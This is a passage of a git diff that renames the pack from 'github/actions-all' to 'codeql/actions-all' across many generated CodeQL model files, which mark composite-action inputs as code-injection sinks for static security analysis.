b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index dde14bfa277..c669f9be2f8 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 0aabf2e1d7f..ef7bf632aee 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 6fdfb2e6eba..1aa3eedfe89 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index b068e810823..aa9670d3de3 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9107fd9e85c..79cc879fa67 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index ee81ae11045..f8964efbc56 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index a8030627789..102d0aa85e5 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index a89b000bedf..c1743b69eb2 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index a98ea12496f..47a1811b49f 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index 8475ef34240..9941f981d75 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index fff5eaab1f4..eac3e751bde 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 5d0cef62b0b..3c613a4eb88 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 3edfa5ef14d..b846058b3f0 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index d5f640e91a5..7337d8896f3 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 32945cb21e3..3c6675a13c9 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 42eeca98de4..9f0f612d1a6 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 5c0777ce394..9e5715f2638 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index ac777af0285..02fe0539869 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 26a587e4f5c..86be8acfeea 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index a26ebcfa57d..fff292f42bb 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index bf39b24e841..141c52a8ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 00cb4906bb5..a073f87d945 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 85f583a5e88..5e10745332b 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index 207b5705e51..e278f0849bf 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index f0f3be91b4b..45598fe4bc7 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 04e779b9579..f1689c52029 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 7939469934e..00ae4bfb9b8 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index 1af5c9435af..1bd2cf92418 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index bcb9dc853d6..2dc89f564f5 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index ec5b1a4e50c..9dbd2fce989 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 2f0bb66127b..7722a635307 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 65953f0387a..4fc41527037 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 035e331a007..729aa139693 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 1cf431a7573..e08457ef5ea 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 669d7f443b1..c19a1fc3eef 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index b53f0949903..a719b0dc87e 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 4e9af4a1a8e..9a9b3a5d3df 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 3fd31a3612f..3f9b4ea61cc 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 090bf1afc85..6e36f5dea2b 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 47afbc44f76..f1b143d7c44 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 4e173c717e5..42d9df16b35 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 8091471b3c0..386b0aa6ea9 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index a3b3a5624c1..54bf59f0647 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 22264f3f29f..2a2a8fcc206 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index e33a45e698b..05dbdf6bf45 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index a2d5e1ef7a3..4276ce4b98d 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index e0ae2bc70bd..ac210c93a1e 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 7926fa4e083..501d4a8a45f 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 2369c82bcb7..b582844dc7c 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d388b1a55b3..9de22328187 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index dade6e8c958..7234c3cbd5f 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 9ac87054f10..27ee66eae48 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 3f9f3f63207..96586d29534 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index aff068890ad..5e7e997272d 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 0304e585bb6..8a932612100 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 46950d380cb..494e71db707 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", 